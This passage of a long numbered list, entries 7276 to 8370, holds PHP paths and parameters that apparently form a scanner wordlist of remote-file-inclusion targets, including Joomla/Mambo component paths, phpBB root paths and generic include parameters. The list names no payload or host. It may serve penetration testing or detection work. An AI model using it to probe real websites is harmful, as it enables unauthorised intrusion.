  7276. /modules/Forums/admin/admin_styles.php?phpbb_root_path=
  7277. /include/write.php?dir=
  7278. index.php?side=
  7279. index.php?show=
  7280. index.php?opcao=
  7281. index.php?c=
  7282. index.php?x=
  7283. components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=
  7284. index.php?place=
  7285. principal.php?conteudo=
  7286. home.php?action=
  7287. index.php?meio.php=
  7288. index.php?visualizar=
  7289. index.php?cat=
  7290. index2.php?content=
  7291. main.php?pagina=
  7292. index.php?link=
  7293. folder.php?id=
  7294. template.php?goto=
  7295. pages.php?page=
  7296. print.php?page=
  7297. index1.php?menu=
  7298. index2.php?showpage=
  7299. index2.php?ascii_seite=
  7300. index2.php?ID=
  7301. index2.php?url_page=
  7302. index1.php?dat=
  7303. index1.php?site=
  7304. port.php?content=
  7305. main.php?link=
  7306. homepage.php?sel=
  7307. /modules/agendax/addevent.inc.php?agendax_path=
  7308. /classes.php?LOCAL_PATH=
  7309. /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=
  7310. /app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH=
  7311. components/com_performs/performs.php?mosConfig_absolute_path=
  7312. modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
  7313. /components/com_smf/smf.php?mosConfig_absolute_path=
  7314. inc/cmses/aedating4CMS.php?dir[inc]=
  7315. bp_ncom.php?bnrep=
  7316. /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=
  7317. /jscript.php?my_ms[root]=
  7318. /includes/functions_portal.php?phpbb_root_path=
  7319. pagina.php?ir=
  7320. index3.php?url=
  7321. index1.php?action=
  7322. file.php?ki=
  7323. include.php?loader=
  7324. index2.php?module=
  7325. gallery.php?strona=
  7326. general.php?itemnav=
  7327. enter.php?base_dir=
  7328. general.php?thispage=
  7329. index3.php?p=
  7330. main.php?type=
  7331. sitio.php?start=
  7332. gallery.php?eval=
  7333. index2.php?base_dir=
  7334. *.php?include=
  7335. padrao.php?sivu=
  7336. principal.php?recipe=
  7337. file.php?pref=
  7338. show.php?go=
  7339. down*.php?oldal=
  7340. layout.php?disp=
  7341. standard.php?goto=
  7342. index2.php?phpbb_root_path=
  7343. enter.php?chapter=
  7344. mod*.php?link=
  7345. head.php?pollname=
  7346. standard.php?param=
  7347. general.php?where=
  7348. head.php?*[*]*=
  7349. home.php?ref=
  7350. view.php?b=
  7351. include.php?loc=
  7352. info.php?option=
  7353. index3.php?ir=
  7354. view.php?cmd=
  7355. index.php?module=
  7356. file.php?url=
  7357. general.php?menue=
  7358. index1.php?b=
  7359. nota.php?chapter=
  7360. start.php?addr=
  7361. home.php?itemnav=
  7362. default.php?read=
  7363. down*.php?to=
  7364. index1.php?loc=
  7365. principal.php?pr=
  7366. standard.php?seccion=
  7367. home.php?sec=
  7368. standard.php?cmd=
  7369. mod*.php?thispage=
  7370. base.php?to=
  7371. base.php?middlePart=
  7372. base.php?panel=
  7373. template.php?mod=
  7374. blank.php?pref=
  7375. standard.php?in=
  7376. general.php?cmd=
  7377. pagina.php?panel=
  7378. *inc*.p
  7379. *inc*.php?inc=
  7380. template.php?where=
  7381. path.php?channel=
  7382. layout.php?my=
  7383. page.php?tipo=
  7384. *inc*.php?sivu=
  7385. press.php?i=
  7386. path.php?start=
  7387. press.php?inc=
  7388. *inc*.php?str=
  7389. include.php?middlePart=
  7390. index2.php?left=
  7391. base.php?k=
  7392. index3.php?pag=
  7393. down*.php?OpenPage=
  7394. sitio.php?strona=
  7395. main.php?strona=
  7396. sitio.php?index=
  7397. index3.php?option=
  7398. index.php?basepath=
  7399. info.php?in=
  7400. print.php?pname=
  7401. blank.php?itemnav=
  7402. default.php?n=
  7403. blank.php?pagina=
  7404. index1.php?d=
  7405. principal.php?pre=
  7406. start.php?p=
  7407. standard.php?home=
  7408. index2.php?oldal=
  7409. general.php?addr=
  7410. start.php?eval=
  7411. index.php?secao=
  7412. head.php?mod=
  7413. template.php?page=
  7414. home.php?seite=
  7415. index.php?modo=
  7416. page.php?url=
  7417. show.php?module=
  7418. pagina.php?left=
  7419. layout.php?c=
  7420. principal.php?w=
  7421. standard.php?base_dir=
  7422. home.php?where=
  7423. main.php?adresa=
  7424. *inc*.php?adresa=
  7425. padrao.php?str=
  7426. default.php?opcion=
  7427. show.php?home=
  7428. index.php?load=
  7429. index3.php?rub=
  7430. nota.php?mod=
  7431. default.php?m=
  7432. sub*.php?mid=
  7433. path.php?link=
  7434. principal.php?my=
  7435. *inc*.php?base_dir=
  7436. padrao.php?rub=
  7437. page.php?incl=
  7438. gallery.php?disp=
  7439. head.php?modo=
  7440. include.php?u=
  7441. principal.php?pagina=
  7442. show.php?left=
  7443. gallery.php?url=
  7444. sub*.php?*root*=
  7445. print.php?choix=
  7446. include.php?corpo=
  7447. base.php?disp=
  7448. sub*.php?OpenPage=
  7449. gallery.php?xlink=
  7450. show.php?xlink=
  7451. file.php?left=
  7452. padrao.php?oldal=
  7453. sub*.php?lang=
  7454. nota.php?destino=
  7455. general.php?module=
  7456. index2.php?loader=
  7457. index3.php?redirect=
  7458. down*.php?param=
  7459. default.php?ki=
  7460. principal.php?disp=
  7461. sub*.php?viewpage=
  7462. padrao.php?read=
  7463. base.php?seccion=
  7464. mod*.php?cont=
  7465. index1.php?l=
  7466. down*.php?pr=
  7467. gallery.php?viewpage=
  7468. template.php?load=
  7469. show.php?filepath=
  7470. index2.php?channel=
  7471. principal.php?opcion=
  7472. start.php?str=
  7473. press.php?*[*]*=
  7474. include.php?adresa=
  7475. sub*.php?corpo=
  7476. sitio.php?t=
  7477. blank.php?OpenPage=
  7478. path.php?ev=
  7479. print.php?module=
  7480. head.php?tipo=
  7481. nota.php?basepath=
  7482. index2.php?in=
  7483. blank.php?channel=
  7484. mod*.php?j=
  7485. principal.php?eval=
  7486. head.php?pageweb=
  7487. file.php?qry=
  7488. path.php?type=
  7489. layout.php?g=
  7490. general.php?var=
  7491. standard.php?subject=
  7492. base.php?second=
  7493. nota.php?base_dir=
  7494. main.php?pname=
  7495. sitio.php?ev=
  7496. home.php?sekce=
  7497. sitio.php?sp=
  7498. *inc*.php?modo=
  7499. nota.php?tipo=
  7500. view.php?to=
  7501. include.php?middle=
  7502. start.php?*root*=
  7503. start.php?module=
  7504. include.php?phpbb_root_path=
  7505. main.php?load=
  7506. enter.php?pg=
  7507. padrao.php?redirect=
  7508. show.php?sp=
  7509. enter.php?w=
  7510. base.php?rub=
  7511. home.php?section=
  7512. default.php?y=
  7513. gallery.php?*[*]*=
  7514. include.php?cmd=
  7515. index1.php?o=
  7516. path.php?destino=
  7517. index3.php?home=
  7518. *inc*.php?menu=
  7519. default.php?seite=
  7520. path.php?eval=
  7521. base.php?choix=
  7522. info.php?pagina=
  7523. file.php?doshow=
  7524. index3.php?pname=
  7525. nota.php?in=
  7526. default.php?x=
  7527. path.php?middlePart=
  7528. down*.php?sp=
  7529. page.php?module=
  7530. default.php?option=
  7531. index3.php?ev=
  7532. gallery.php?ki=
  7533. blank.php?path=
  7534. pagina.php?v=
  7535. path.php?y=
  7536. template.php?qry=
  7537. start.php?option=
  7538. page.php?abre=
  7539. sub*.php?g=
  7540. index3.php?var=
  7541. print.php?left=
  7542. print.php?u=
  7543. start.php?loader=
  7544. default.php?param=
  7545. down*.php?texto=
  7546. index3.php?mid=
  7547. down*.php?disp=
  7548. view.php?where=
  7549. default.php?type=
  7550. blank.php?subject=
  7551. mod*.php?incl=
  7552. base.php?l=
  7553. path.php?filepath=
  7554. show.php?middlePart=
  7555. layout.php?z=
  7556. view.php?seccion=
  7557. layout.php?chapter=
  7558. sub*.php?cont=
  7559. info.php?oldal=
  7560. general.php?rub=
  7561. head.php?sekce=
  7562. sub*.php?path=
  7563. layout.php?pref=
  7564. index2.php?basepath=
  7565. path.php?doshow=
  7566. path.php?panel=
  7567. file.php?pagina=
  7568. gallery.php?qry=
  7569. path.php?sp=
  7570. main.php?url=
  7571. general.php?section=
  7572. base.php?filepath=
  7573. default.php?incl=
  7574. include.php?content=
  7575. show.php?redirect=
  7576. template.php?ref=
  7577. head.php?load=
  7578. general.php?base_dir=
  7579. padrao.php?choix=
  7580. index.php?channel=
  7581. index1.php?home=
  7582. base.php?pag=
  7583. sub*.php?header=
  7584. general.php?qry=
  7585. index2.php?home=
  7586. press.php?nivel=
  7587. enter.php?read=
  7588. head.php?adresa=
  7589. print.php?param=
  7590. enter.php?pr=
  7591. view.php?content=
  7592. standard.php?showpage=
  7593. main.php?pg=
  7594. page.php?panel=
  7595. info.php?itemnav=
  7596. file.php?to=
  7597. main.php?tipo=
  7598. base.php?itemnav=
  7599. standard.php?where=
  7600. sitio.php?disp=
  7601. print.php?addr=
  7602. mod*.php?oldal=
  7603. padrao.php?page=
  7604. show.php?thispage=
  7605. sub*.php?go=
  7606. index2.php?option=
  7607. index3.php?inc=
  7608. main.php?start=
  7609. standard.php?my=
  7610. enter.php?mid=
  7611. base.php?pageweb=
  7612. main.php?action=
  7613. pagina.php?path=
  7614. press.php?id=
  7615. path.php?home=
  7616. main.php?inc=
  7617. default.php?seccion=
  7618. print.php?numero=
  7619. include.php?sec=
  7620. general.php?texto=
  7621. index3.php?go=
  7622. sub*.php?sec=
  7623. home.php?channel=
  7624. base.php?body=
  7625. index.php?cmd=
  7626. index3.php?left=
  7627. sub*.php?middle=
  7628. page.php?mid=
  7629. blank.php?sp=
  7630. index1.php?pagina=
  7631. default.php?panel=
  7632. blank.php?id=
  7633. print.php?read=
  7634. show.php?z=
  7635. start.php?name=
  7636. head.php?goto=
  7637. page.php?where=
  7638. layout.php?category=
  7639. path.php?qry=
  7640. principal.php?phpbb_root_path=
  7641. nota.php?channel=
  7642. default.php?*root*=
  7643. file.php?include=
  7644. enter.php?body=
  7645. page.php?choix=
  7646. start.php?xlink=
  7647. home.php?k=
  7648. down*.php?ir=
  7649. pagina.php?dir=
  7650. sitio.php?abre=
  7651. index1.php?recipe=
  7652. general.php?redirect=
  7653. home.php?ir=
  7654. padrao.php?open=
  7655. padrao.php?u=
  7656. enter.php?type=
  7657. down*.php?pre=
  7658. main.php?path=
  7659. nota.php?ir=
  7660. press.php?link=
  7661. page.php?showpage=
  7662. home.php?panel=
  7663. default.php?eval=
  7664. index1.php?pr=
  7665. view.php?showpage=
  7666. show.php?get=
  7667. pagina.php?cmd=
  7668. view.php?body=
  7669. head.php?rub=
  7670. padrao.php?seccion=
  7671. path.php?secao=
  7672. gallery.php?tipo=
  7673. main.php?param=
  7674. down*.php?in=
  7675. nota.php?include=
  7676. standard.php?secc=
  7677. print.php?my=
  7678. general.php?abre=
  7679. index3.php?include=
  7680. enter.php?strona=
  7681. sub*.php?s=
  7682. show.php?channel=
  7683. enter.php?get=
  7684. general.php?subject=
  7685. index3.php?phpbb_root_path=
  7686. gallery.php?where=
  7687. include.php?header=
  7688. head.php?middle=
  7689. index1.php?incl=
  7690. home.php?choix=
  7691. index1.php?c=
  7692. index2.php?var=
  7693. main.php?pref=
  7694. sub*.php?sp=
  7695. index1.php?pname=
  7696. view.php?sec=
  7697. file.php?where=
  7698. print.php?name=
  7699. print.php?menue=
  7700. padrao.php?xlink=
  7701. head.php?y=
  7702. show.php?type=
  7703. start.php?corpo=
  7704. file.php?chapter=
  7705. home.php?chapter=
  7706. sitio.php?chapter=
  7707. nota.php?n=
  7708. start.php?adresa=
  7709. standard.php?go=
  7710. start.php?pollname=
  7711. sub*.php?module=
  7712. enter.php?thispage=
  7713. principal.php?z=
  7714. main.php?my=
  7715. mod*.php?index=
  7716. file.php?loader=
  7717. down*.php?seite=
  7718. index2.php?doshow=
  7719. nota.php?inc=
  7720. standard.php?index=
  7721. gallery.php?to=
  7722. index1.php?var=
  7723. gallery.php?abre=
  7724. principal.php?p=
  7725. pagina.php?index=
  7726. view.php?qry=
  7727. home.php?tipo=
  7728. page.php?numero=
  7729. index1.php?strona=
  7730. show.php?inc=
  7731. gallery.php?pag=
  7732. view.php?channel=
  7733. index2.php?redirect=
  7734. default.php?mod=
  7735. home.php?module=
  7736. general.php?left=
  7737. general.php?page=
  7738. path.php?adresa=
  7739. padrao.php?type=
  7740. template.php?pag=
  7741. down*.php?z=
  7742. general.php?inc=
  7743. home.php?read=
  7744. pagina.php?section=
  7745. home.php?menu=
  7746. default.php?basepath=
  7747. index2.php?open=
  7748. index2.php?goto=
  7749. path.php?subject=
  7750. general.php?sivu=
  7751. general.php?read=
  7752. principal.php?ev=
  7753. main.php?middle=
  7754. index2.php?filepath=
  7755. index1.php?oldal=
  7756. press.php?pagina=
  7757. index3.php?sekce=
  7758. page.php?z=
  7759. info.php?filepath=
  7760. index3.php?ref=
  7761. base.php?opcion=
  7762. path.php?category=
  7763. index3.php?start=
  7764. print.php?loc=
  7765. sitio.php?body=
  7766. pagina.php?n=
  7767. start.php?rub=
  7768. *inc*.php?i=
  7769. gallery.php?option=
  7770. mod*.php?sekce=
  7771. blank.php?pre=
  7772. general.php?channel=
  7773. template.php?thispage=
  7774. file.php?incl=
  7775. sitio.php?e=
  7776. mod*.php?middle=
  7777. sub*.php?adresa=
  7778. blank.php?action=
  7779. principal.php?loader=
  7780. gallery.php?id=
  7781. base.php?t=
  7782. main.php?addr=
  7783. press.php?redirect=
  7784. pagina.php?tipo=
  7785. pagina.php?seccion=
  7786. layout.php?action=
  7787. index.php?w=
  7788. include.php?ref=
  7789. press.php?loader=
  7790. gallery.php?showpage=
  7791. index.php?sekce=
  7792. sub*.php?seite=
  7793. sitio.php?go=
  7794. layout.php?addr=
  7795. nota.php?mid=
  7796. page.php?p=
  7797. mod*.php?corpo=
  7798. blank.php?category=
  7799. sub*.php?where=
  7800. *inc*.php?y=
  7801. index3.php?index=
  7802. page.php?phpbb_root_path=
  7803. path.php?body=
  7804. principal.php?menue=
  7805. main.php?thispage=
  7806. index3.php?d=
  7807. main.php?loc=
  7808. general.php?b=
  7809. include.php?left=
  7810. show.php?base_dir=
  7811. template.php?a=
  7812. index.php?param=
  7813. default.php?channel=
  7814. general.php?pollname=
  7815. template.php?nivel=
  7816. file.php?texto=
  7817. enter.php?page=
  7818. standard.php?str=
  7819. main.php?v=
  7820. base.php?middle=
  7821. print.php?tipo=
  7822. down*.php?subject=
  7823. principal.php?pag=
  7824. enter.php?sivu=
  7825. path.php?option=
  7826. index.php?strona=
  7827. home.php?index=
  7828. home.php?include=
  7829. default.php?page=
  7830. head.php?numero=
  7831. print.php?option=
  7832. default.php?v=
  7833. index2.php?qry=
  7834. general.php?ref=
  7835. sub*.php?secao=
  7836. gallery.php?cont=
  7837. file.php?param=
  7838. sub*.php?secc=
  7839. path.php?pageweb=
  7840. info.php?r=
  7841. default.php?load=
  7842. base.php?phpbb_root_path=
  7843. main.php?itemnav=
  7844. down*.php?pa=
  7845. standard.php?open=
  7846. default.php?itemnav=
  7847. index2.php?cmd=
  7848. press.php?xlink=
  7849. index.php?path=
  7850. index1.php?second=
  7851. start.php?modo=
  7852. index3.php?sivu=
  7853. index3.php?my=
  7854. print.php?OpenPage=
  7855. print.php?inc=
  7856. default.php?thispage=
  7857. base.php?adresa=
  7858. home.php?middlePart=
  7859. index3.php?channel=
  7860. index3.php?oldal=
  7861. template.php?sekce=
  7862. base.php?path=
  7863. default.php?l=
  7864. home.php?eval=
  7865. blank.php?goFile=
  7866. head.php?loc=
  7867. index.php?index=
  7868. page.php?ir=
  7869. print.php?path=
  7870. layout.php?ir=
  7871. down*.php?path=
  7872. start.php?pageweb=
  7873. template.php?sp=
  7874. press.php?menu=
  7875. standard.php?section=
  7876. principal.php?seite=
  7877. gallery.php?chapter=
  7878. nota.php?qry=
  7879. pagina.php?pagina=
  7880. default.php?menu=
  7881. *inc*.php?open=
  7882. index3.php?secao=
  7883. standard.php?*[*]*=
  7884. default.php?abre=
  7885. template.php?basepath=
  7886. index2.php?ir=
  7887. file.php?modo=
  7888. start.php?destino=
  7889. path.php?ir=
  7890. layout.php?var=
  7891. mod*.php?pre=
  7892. start.php?pg=
  7893. press.php?strona=
  7894. nota.php?cmd=
  7895. index1.php?showpage=
  7896. standard.php?abre=
  7897. path.php?load=
  7898. path.php?left=
  7899. down*.php?inc=
  7900. index3.php?abre=
  7901. blank.php?where=
  7902. info.php?start=
  7903. print.php?dir=
  7904. main.php?disp=
  7905. standard.php?name=
  7906. padrao.php?cont=
  7907. start.php?strona=
  7908. path.php?addr=
  7909. mod*.php?path=
  7910. blank.php?base_dir=
  7911. base.php?sekce=
  7912. pagina.php?loader=
  7913. press.php?category=
  7914. nota.php?secc=
  7915. index.php?tipo=
  7916. index.php?goto=
  7917. print.php?pag=
  7918. view.php?secao=
  7919. file.php?second=
  7920. page.php?e=
  7921. gallery.php?thispage=
  7922. start.php?base_dir=
  7923. template.php?addr=
  7924. gallery.php?panel=
  7925. sitio.php?nivel=
  7926. general.php?middle=
  7927. head.php?disp=
  7928. standard.php?q=
  7929. general.php?w=
  7930. enter.php?go=
  7931. page.php?middle=
  7932. template.php?ir=
  7933. pagina.php?OpenPage=
  7934. show.php?adresa=
  7935. head.php?content=
  7936. principal.php?pref=
  7937. index3.php?adresa=
  7938. pagina.php?sec=
  7939. home.php?w=
  7940. home.php?in=
  7941. file.php?eval=
  7942. general.php?content=
  7943. press.php?base_dir=
  7944. sub*.php?recipe=
  7945. enter.php?viewpage=
  7946. main.php?ir=
  7947. index.php?pg=
  7948. show.php?pageweb=
  7949. index.php?opcion=
  7950. blank.php?link=
  7951. file.php?sivu=
  7952. main.php?eval=
  7953. gallery.php?nivel=
  7954. standard.php?j=
  7955. show.php?oldal=
  7956. enter.php?link=
  7957. enter.php?content=
  7958. blank.php?filepath=
  7959. standard.php?channel=
  7960. main.php?include=
  7961. main.php?page=
  7962. base.php?*[*]*=
  7963. press.php?modo=
  7964. home.php?rub=
  7965. default.php?k=
  7966. index3.php?t=
  7967. index3.php?showpage=
  7968. start.php?chapter=
  7969. path.php?p=
  7970. page.php?base_dir=
  7971. show.php?incl=
  7972. enter.php?path=
  7973. principal.php?index=
  7974. principal.php?inc=
  7975. show.php?play=
  7976. nota.php?subject=
  7977. index1.php?path=
  7978. default.php?secc=
  7979. sub*.php?option=
  7980. default.php?loader=
  7981. padrao.php?var=
  7982. file.php?oldal=
  7983. layout.php?OpenPage=
  7984. sitio.php?pg=
  7985. press.php?channel=
  7986. pagina.php?ev=
  7987. page.php?option=
  7988. press.php?mid=
  7989. index1.php?*root*=
  7990. show.php?qry=
  7991. index2.php?itemnav=
  7992. print.php?thispage=
  7993. sitio.php?addr=
  7994. show.php?param=
  7995. enter.php?incl=
  7996. index3.php?mod=
  7997. index3.php?panel=
  7998. include.php?play=
  7999. path.php?cmd=
  8000. file.php?sp=
  8001. nota.php?pre=
  8002. template.php?section=
  8003. view.php?str=
  8004. head.php?lang=
  8005. pagina.php?g=
  8006. main.php?e=
  8007. start.php?seite=
  8008. home.php?h=
  8009. index3.php?sp=
  8010. sub*.php?base_dir=
  8011. path.php?middle=
  8012. principal.php?destino=
  8013. pagina.php?str=
  8014. index3.php?menue=
  8015. base.php?play=
  8016. home.php?opcion=
  8017. standard.php?var=
  8018. info.php?param=
  8019. general.php?second=
  8020. sub*.php?mod=
  8021. view.php?oldal=
  8022. head.php?corpo=
  8023. standard.php?op=
  8024. index2.php?inc=
  8025. info.php?pref=
  8026. base.php?basepath=
  8027. sub*.php?thispage=
  8028. print.php?basepath=
  8029. *inc*.php?m=
  8030. layout.php?loader=
  8031. layout.php?strona=
  8032. sitio.php?oldal=
  8033. sub*.php?u=
  8034. index1.php?go=
  8035. press.php?pageweb=
  8036. standard.php?s=
  8037. sub*.php?pa=
  8038. enter.php?texto=
  8039. start.php?secao=
  8040. home.php?link=
  8041. template.php?*[*]*=
  8042. gallery.php?action=
  8043. base.php?oldal=
  8044. nota.php?get=
  8045. index3.php?dir=
  8046. index3.php?link=
  8047. standard.php?oldal=
  8048. sub*.php?abre=
  8049. view.php?load=
  8050. mod*.php?action=
  8051. nota.php?showpage=
  8052. head.php?c=
  8053. view.php?mid=
  8054. padrao.php?addr=
  8055. index2.php?adresa=
  8056. head.php?sec=
  8057. gallery.php?pname=
  8058. index1.php?subject=
  8059. gallery.php?sivu=
  8060. sub*.php?chapter=
  8061. padrao.php?header=
  8062. head.php?opcion=
  8063. index3.php?pref=
  8064. enter.php?subject=
  8065. nota.php?panel=
  8066. page.php?left=
  8067. sitio.php?left=
  8068. show.php?include=
  8069. pagina.php?start=
  8070. blank.php?pr=
  8071. head.php?choix=
  8072. index3.php?tipo=
  8073. print.php?play=
  8074. general.php?sekce=
  8075. show.php?m=
  8076. index3.php?choix=
  8077. down*.php?channel=
  8078. index1.php?mod=
  8079. home.php?showpage=
  8080. show.php?l=
  8081. index1.php?read=
  8082. general.php?choix=
  8083. blank.php?url=
  8084. home.php?my=
  8085. start.php?param=
  8086. layout.php?sekce=
  8087. start.php?thispage=
  8088. nota.php?play=
  8089. mod*.php?secao=
  8090. show.php?second=
  8091. show.php?n=
  8092. start.php?pname=
  8093. enter.php?include=
  8094. down*.php?doshow=
  8095. index2.php?pre=
  8096. layout.php?nivel=
  8097. home.php?base_dir=
  8098. include.php?eval=
  8099. principal.php?middle=
  8100. main.php?where=
  8101. path.php?strona=
  8102. file.php?index=
  8103. mod*.php?module=
  8104. mod*.php?OpenPage=
  8105. standard.php?pr=
  8106. pagina.php?ref=
  8107. index.php?b=
  8108. path.php?pname=
  8109. info.php?eval=
  8110. include.php?path=
  8111. padrao.php?qry=
  8112. file.php?corpo=
  8113. sub*.php?qry=
  8114. head.php?module=
  8115. nota.php?opcion=
  8116. pagina.php?include=
  8117. page.php?link=
  8118. start.php?abre=
  8119. *inc*.php?c=
  8120. down*.php?cmd=
  8121. base.php?str=
  8122. gallery.php?module=
  8123. sub*.php?open=
  8124. head.php?sivu=
  8125. sitio.php?menue=
  8126. page.php?inc=
  8127. home.php?addr=
  8128. pagina.php?header=
  8129. mod*.php?v=
  8130. pagina.php?k=
  8131. index1.php?chapter=
  8132. general.php?e=
  8133. index3.php?seccion=
  8134. index.php?where=
  8135. general.php?type=
  8136. index1.php?abre=
  8137. info.php?seccion=
  8138. index2.php?pa=
  8139. nota.php?disp=
  8140. home.php?thispage=
  8141. show.php?to=
  8142. view.php?u=
  8143. default.php?nivel=
  8144. show.php?header=
  8145. view.php?chapter=
  8146. start.php?tipo=
  8147. info.php?secao=
  8148. index.php?var=
  8149. standard.php?menu=
  8150. index2.php?pollname=
  8151. index3.php?path=
  8152. home.php?redirect=
  8153. enter.php?goto=
  8154. general.php?secao=
  8155. down*.php?addr=
  8156. down*.php?section=
  8157. principal.php?f=
  8158. sub*.php?menue=
  8159. padrao.php?abre=
  8160. index2.php?section=
  8161. general.php?my=
  8162. general.php?goto=
  8163. index3.php?base_dir=
  8164. layout.php?basepath=
  8165. start.php?header=
  8166. pagina.php?modo=
  8167. base.php?name=
  8168. down*.php?u=
  8169. view.php?redirect=
  8170. info.php?ev=
  8171. index1.php?nivel=
  8172. include.php?seccion=
  8173. print.php?rub=
  8174. mod*.php?include=
  8175. include.php?read=
  8176. *inc*.php?pg=
  8177. press.php?rub=
  8178. index2.php?incl=
  8179. pagina.php?chapter=
  8180. padrao.php?pname=
  8181. pagina.php?recipe=
  8182. index.php?pref=
  8183. page.php?action=
  8184. gallery.php?menue=
  8185. template.php?op=
  8186. info.php?doshow=
  8187. default.php?sivu=
  8188. *inc*.php?start=
  8189. principal.php?corpo=
  8190. padrao.php?middle=
  8191. sitio.php?content=
  8192. base.php?pname=
  8193. press.php?thispage=
  8194. press.php?pa=
  8195. index1.php?redirect=
  8196. index2.php?sekce=
  8197. mod*.php?d=
  8198. view.php?sp=
  8199. nota.php?m=
  8200. blank.php?open=
  8201. index.php?pollname=
  8202. head.php?oldal=
  8203. index1.php?str=
  8204. page.php?recipe=
  8205. template.php?corpo=
  8206. nota.php?sec=
  8207. print.php?r=
  8208. mod*.php?addr=
  8209. base.php?category=
  8210. standard.php?lang=
  8211. press.php?pname=
  8212. mod*.php?phpbb_root_path=
  8213. default.php?include=
  8214. default.php?module=
  8215. print.php?str=
  8216. base.php?ki=
  8217. nota.php?OpenPage=
  8218. print.php?l=
  8219. file.php?cmd=
  8220. down*.php?read=
  8221. down*.php?action=
  8222. principal.php?left=
  8223. mod*.php?start=
  8224. blank.php?qry=
  8225. default.php?left=
  8226. print.php?type=
  8227. nota.php?b=
  8228. path.php?loader=
  8229. index1.php?adresa=
  8230. nota.php?corpo=
  8231. mod*.php?pageweb=
  8232. standard.php?cont=
  8233. blank.php?read=
  8234. sitio.php?redirect=
  8235. index1.php?cmd=
  8236. info.php?redirect=
  8237. down*.php?nivel=
  8238. down*.php?t=
  8239. view.php?goFile=
  8240. print.php?menu=
  8241. template.php?param=
  8242. show.php?b=
  8243. blank.php?body=
  8244. sitio.php?param=
  8245. path.php?pref=
  8246. padrao.php?subject=
  8247. nota.php?modo=
  8248. blank.php?section=
  8249. path.php?nivel=
  8250. template.php?showpage=
  8251. view.php?ki=
  8252. press.php?option=
  8253. press.php?pref=
  8254. show.php?mid=
  8255. blank.php?o=
  8256. sitio.php?pr=
  8257. down*.php?home=
  8258. padrao.php?OpenPage=
  8259. info.php?pageweb=
  8260. blank.php?h=
  8261. default.php?base_dir=
  8262. principal.php?ref=
  8263. show.php?loader=
  8264. file.php?action=
  8265. path.php?mid=
  8266. start.php?lang=
  8267. info.php?opcion=
  8268. head.php?read=
  8269. principal.php?oldal=
  8270. show.php?cmd=
  8271. include.php?redirect=
  8272. print.php?itemnav=
  8273. enter.php?index=
  8274. print.php?middle=
  8275. sitio.php?goFile=
  8276. head.php?include=
  8277. gallery.php?corpo=
  8278. enter.php?e=
  8279. index.php?play=
  8280. show.php?nivel=
  8281. layout.php?choix=
  8282. page.php?redirect=
  8283. info.php?body=
  8284. general.php?ir=
  8285. include.php?go=
  8286. include.php?pageweb=
  8287. show.php?seccion=
  8288. mod*.php?pagina=
  8289. sub*.php?name=
  8290. principal.php?header=
  8291. main.php?opcion=
  8292. file.php?ev=
  8293. index.php?addr=
  8294. blank.php?oldal=
  8295. nota.php?url=
  8296. index2.php?action=
  8297. sub*.php?pre=
  8298. include.php?index=
  8299. gallery.php?pageweb=
  8300. padrao.php?path=
  8301. mod*.php?strona=
  8302. info.php?url=
  8303. index1.php?pg=
  8304. print.php?in=
  8305. nota.php?nivel=
  8306. default.php?f=
  8307. head.php?ki=
  8308. press.php?my=
  8309. principal.php?to=
  8310. principal.php?abre=
  8311. index3.php?q=
  8312. nota.php?pg=
  8313. sitio.php?category=
  8314. index2.php?link=
  8315. blank.php?z=
  8316. layout.php?numero=
  8317. components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
  8318. module_db.php?pivot_path=
  8319. components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
  8320. index.php?RP_PATH=
  8321. include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=
  8322. send_reminders.php?includedir=
  8323. components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=
  8324. admin/index.php?o=
  8325. tools/send_reminders.php?includedir=
  8326. components/com_simpleboard/image_upload.php?sbp=
  8327. components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
  8328. admin/doeditconfig.php?thispath=../includes&config[path]=
  8329. wamp_dir/setup/yesno.phtml?no_url=
  8330. modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
  8331. mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
  8332. inc/header.php/step_one.php?server_inc=
  8333. include/new-visitor.inc.php?lvc_include_dir=
  8334. support/mailling/maillist/inc/initdb.php?absolute_path=
  8335. zentrack/index.php?configFile=
  8336. pivot/modules/module_db.php?pivot_path=
  8337. install/index.php?lng=../../include/main.inc&G_PATH=
  8338. inc/pipe.php?HCL_path=
  8339. include/write.php?dir=
  8340. /modules/4nAlbum/public/displayCategory.php?basepath=
  8341. /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
  8342. /modules/coppermine/themes/maze/theme.php?THEME_DIR=
  8343. /modules/coppermine/include/init.inc.php?CPG_M_DIR=
  8344. /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
  8345. /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
  8346. /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
  8347. /components/com_simpleboard/image_upload.php?sbp=
  8348. /components/com_simpleboard/file_upload.php?sbp=
  8349. /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
  8350. /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
  8351. /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
  8352. /components/com_securityimages/configinsert.php?mosConfig_absolute_path=
  8353. /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
  8354. /e107/e107_handlers/secure_img_render.php?p=
  8355. /modules/My_eGallery/public/inc/?HCL_path=
  8356. /modules/My_eGallery/index.php?basepath=
  8357. /modules/Forums/admin/admin_avatar.php?phpbb_root_path=
  8358. /modules/newbb_plus/class/forumpollrenderer.php?bbPath=
  8359. /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
  8360. /cutenews/comments.php?cutepath=
  8361. /impex/ImpExData.php?systempath=
  8362. /coppermine/thumbnails.php?lang=
  8363. /ashnews.php?pathtoashnews=
  8364. /4images/index.php?template=
  8365. /galeri/index.php?template=
  8366. /auth/auth.php?phpbb_root_path=
  8367. /include/common.php?include_path=
  8368. /event/index.php?page=
  8369. /forum/index.php?includeFooter=
  8370. /forum/includes/kb_constants.php?module_root_path=
